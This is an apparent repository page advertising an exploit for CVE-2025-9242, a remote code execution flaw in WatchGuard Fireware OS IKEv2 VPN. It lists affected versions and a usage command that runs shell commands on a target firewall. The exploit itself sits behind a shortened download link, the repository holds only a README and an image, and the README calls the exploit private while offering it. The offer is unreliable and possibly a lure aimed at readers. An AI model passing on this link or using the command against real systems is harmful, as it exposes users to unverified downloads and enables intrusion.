CVE-2025-9242 PoC — WatchGuard Fireware OS 安全漏洞

Source

Associated Vulnerability

Readme

# Out-of-bounds Write Vulnerability in WatchGuard Fireware OS for VPN Solutions (CVE-2025-9242)

## Overview

An Out-of-bounds Write vulnerability in WatchGuard Fireware OS affecting Mobile User VPN with IKEv2 and Branch Office VPN using IKEv2 when configured with a dynamic gateway peer.

## Details

- **CVE ID**: [CVE-2025-9242](https://nvd.nist.gov/vuln/detail/CVE-2025-9242)
- **Discovered**: 2025-09-17
- **Published**: 2025-10-17
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## Vulnerability Description

A remote unauthenticated attacker can potentially execute arbitrary code, compromising the entire firewall system. The vulnerability has a critical severity with a CVSS score of 9.3, indicating maximum impact on confidentiality, integrity, and availability.

## Affected Versions

**Fireware OS:**

- 11.10.2 up to 11.12.4_Update1,
- 12.0 up to 12.11.3, 
- 2025.1
  

## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact

For inquiries, please contact **pulse@hazexploit.in**

## Exploit:
### [Download here](https://tinyurl.com/2tawn3cf)


![image](https://github.com/pulsecipher/CVE-2025-9242/blob/main/image.png)

File Snapshot

 [4.0K]  /data/pocs/f0f80e892480a68220092ed0bf88502373de1b77
├── [121K]  image.png
└── [1.2K]  README.md

0 directories, 2 files

Remarks